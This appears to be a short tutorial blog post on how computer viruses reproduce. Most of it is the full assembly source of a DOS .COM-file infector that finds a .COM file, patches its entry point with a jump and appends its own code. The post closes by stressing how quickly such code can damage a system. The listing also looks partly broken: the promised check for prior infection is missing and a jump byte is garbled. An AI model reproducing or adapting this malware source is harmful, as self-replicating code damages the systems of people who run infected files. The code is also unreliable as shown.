The survival of a virus is based in its ability to reproduce. “How do I make a program reproduce?”, you might ask.
Simple, by getting it to copy itself to other files….

The functional logic of a virus is as follows:

  1. Search for a file to infect
  2. Open the file to see if it is infected
  3. If infected, search for another file
  4. Else, infect the file
  5. Return control to the host program.

An example of a simple virus written in assembly language:-

This virus once activated searches for the first .COM file in thedirectory and infects it. Later when the infected file is executed it infects files in its directory.
codigo segment ‘code’
org 100h
assume cs:codigo,ds:codigo,es:codigo
start proc far
COMIENZO:
push cs
push cs
pop ds
pop es
call falso_proc
falso_proc proc near
falso_proc endp
pop bp
sub bp, 107h
mov ah, 4eh
lea dx, bp+file_inf
mov cx, 0000h
int 21h
mov ah, 3dh
mov al, 00000010b
mov dx, 009eh
int 21h
push ax
pop bx
push bx
mov ah, 3fh
mov cx, 0003h
lea dx, bp+buffer
int 21h
INFECTAR:
mov ax, 4200h
mov cx, 0000h
mov dx, 0000h
int 21h
mov ah, 40h
mov cx, 1d
lea dx, bp+jump
int 21h
mov cx, 2
mov si, 009ah
lea di, bp+longitud
rep movsb
mov ah, 40h
mov cx, 2d
lea dx, bp+longitud
int 21h
mov ax, 4202h
mov cx, 0000h
mov dx, 0000h
int 21h
add word ptr [bp+longitud],3
pop bx
mov ah, 40h
mov cx, 190d
lea dx, bp+comienzo
int 21h
mov ah, 3eh
int 21h
NO_INFECTAR:
mov cx, 0003h
mov di, 0100h
lea si, bp+buffer
rep movsb
mov ax, 0100h
jmp ax
buffer db 7d dup(0)
longitud db 2 dup(0)
file_inf db ‘*.COM’,0
jump db ‘é’,0
start endp
codigo ends
end comienzo

This virus was written in low level assembly language, hence it is difficult to undestand and code. But it is very fast and is able to cause damage to a system in a very short interval of time.

Leave a Reply